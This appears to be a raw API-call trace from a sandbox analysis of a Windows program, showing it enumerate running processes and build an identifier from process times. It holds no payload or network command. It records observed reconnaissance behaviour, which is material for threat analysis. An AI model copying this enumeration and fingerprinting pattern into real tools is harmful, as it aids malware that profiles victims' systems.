	[0127.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.108] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.108] CloseHandle (hObject=0x2dc) returned 1
	[0127.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.109] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.109] CloseHandle (hObject=0x2dc) returned 1
	[0127.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.145] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.145] CloseHandle (hObject=0x2dc) returned 1
	[0127.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.146] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.146] CloseHandle (hObject=0x2dc) returned 1
	[0127.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.147] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.147] CloseHandle (hObject=0x2dc) returned 1
	[0127.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.147] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.147] CloseHandle (hObject=0x2dc) returned 1
	[0127.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.147] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.147] CloseHandle (hObject=0x2dc) returned 1
	[0127.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.148] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.148] CloseHandle (hObject=0x2dc) returned 1
	[0127.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.148] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.148] CloseHandle (hObject=0x2dc) returned 1
	[0127.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.148] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.148] CloseHandle (hObject=0x2dc) returned 1
	[0127.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.149] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.149] CloseHandle (hObject=0x2dc) returned 1
	[0127.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.149] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.150] CloseHandle (hObject=0x2dc) returned 1
	[0127.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.150] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.150] CloseHandle (hObject=0x2dc) returned 1
	[0127.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.150] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.150] CloseHandle (hObject=0x2dc) returned 1
	[0127.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.151] CloseHandle (hObject=0x2dc) returned 1
	[0127.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.151] CloseHandle (hObject=0x2dc) returned 1
	[0127.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.152] CloseHandle (hObject=0x2dc) returned 1
	[0127.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.152] CloseHandle (hObject=0x2dc) returned 1
	[0127.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.152] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.152] CloseHandle (hObject=0x2dc) returned 1
	[0127.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.153] CloseHandle (hObject=0x2dc) returned 1
	[0127.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.153] CloseHandle (hObject=0x2dc) returned 1
	[0127.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.153] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.153] CloseHandle (hObject=0x2dc) returned 1
	[0127.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.154] CloseHandle (hObject=0x2dc) returned 1
	[0127.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.154] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.154] CloseHandle (hObject=0x2dc) returned 1
	[0127.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.155] CloseHandle (hObject=0x2dc) returned 1
	[0127.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.155] CloseHandle (hObject=0x2dc) returned 1
	[0127.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.155] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.155] CloseHandle (hObject=0x2dc) returned 1
	[0127.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.156] CloseHandle (hObject=0x2dc) returned 1
	[0127.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.156] CloseHandle (hObject=0x2dc) returned 1
	[0127.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.156] CloseHandle (hObject=0x2dc) returned 1
	[0127.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.157] CloseHandle (hObject=0x2dc) returned 1
	[0127.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.157] CloseHandle (hObject=0x2dc) returned 1
	[0127.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.158] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.159] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.159] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.159] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.160] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
